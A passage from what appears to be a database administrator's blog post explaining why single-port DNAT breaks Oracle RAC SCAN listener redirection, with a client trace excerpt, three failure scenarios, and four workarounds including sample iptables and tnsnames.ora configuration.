(1002018528) [06-AUG-2013 09:58:30:537] nsc2addr: (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=10.xx.yy.42)(PORT=1521)))
(1002018528) [06-AUG-2013 09:58:30:572] niotns: niotns: passing ns handle back up...
(1002018528) [06-AUG-2013 09:58:30:572] niotns: exit
[someone@racnode1 ~]$

As you can see from the above example, the following is happening:
a) the client connects via TCP/1521 to raccluster-scan
b) the SCAN listener on raccluster-scan redirects the client – inside the TCP payload – to the hostname of the least loaded Oracle VIP (!)
c) the client spawns a new connection directly to that Oracle VIP on TCP/1521 (!!)

The main problem is that if you have DNAT defined with a single TCP port redirection that looks like this: some Oracle client –(TCP port 33333)–> DNAT/proxy redirection –> Oracle SCAN VIP, it is not going to work, because the Oracle SCAN listener will redirect “some Oracle client” to an Oracle VIP on TCP/1521 (a sketch of such a DNAT rule follows the list below). This will fail in one out of 3 ways:

  1. failure scenario 1: the client might fail to resolve the Oracle VIP hostname using its own DNS
  2. failure scenario 2: the client might succeed with DNS resolution of the OracleVIPX hostname, but be unable to reach the private VIP address via IP routing, because the routers/default gateway won’t know how to route to that destination (e.g. the client is coming from a different organization, the internet, etc.)
  3. failure scenario 3: the client might succeed with DNS resolution and might even be able to route to the OracleVIPX IP, but there is a firewall somewhere in between (e.g. on the same box that is doing the DNAT/TCP proxying) blocking “some client” from reaching OracleVIPX directly on TCP/1521
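For completeness, the kind of single-port DNAT rule meant above might look more or less like this sketch (the 10.0.0.50 SCAN VIP address and the 33333 port are made-up placeholders):

# redirect external TCP/33333 to the SCAN VIP's listener port
iptables -t nat -A PREROUTING -p tcp --dport 33333 -j DNAT --to-destination 10.0.0.50:1521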

There are several solutions to this problem:
1) don’t use the simple Oracle SCAN name, but provide a long TNS connect string with a number of NAT-ted/proxied TCP ports defined (every Oracle RAC node VIP should have its own NAT-ted/proxied TCP port for failover purposes – the Oracle client is responsible for load balancing and failing over connections); see the sketch after this list
- or -
2) implement some kind of highly available TCP proxy that intelligently routes Oracle traffic to healthy RAC instances (e.g. HAProxy, if you really have clients that support only short Oracle hostnames)
- or -
3) do tricks on the external-facing DNS name servers (or locally on clients by placing entries in /etc/hosts), spoofing the internal host names as the proxy ones, but you will need a 1:1 ratio of external to internal IPs to make this work (remember each Oracle VIP serves connections on port 1521!)
- or -
4) THE SIMPLEST ONE: do not use NAT at all and allow direct traffic on the firewall, as NAT is evil :)
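A hedged sketch of option 1, i.e. what such a NAT-friendly tnsnames.ora connect descriptor might look like; the proxy hostname and the 33333/33334 ports are made up for illustration, with each port DNAT-ted/proxied to the corresponding node VIP on TCP/1521:

TNS_ENTRY1_NAT =
  (DESCRIPTION =
    (LOAD_BALANCE = on)
    (FAILOVER = on)
    (ADDRESS = (PROTOCOL = TCP)(HOST = proxy.example.com)(PORT = 33333))
    (ADDRESS = (PROTOCOL = TCP)(HOST = proxy.example.com)(PORT = 33334))
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = TNS_ENTRY1)
    )
  )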

-J.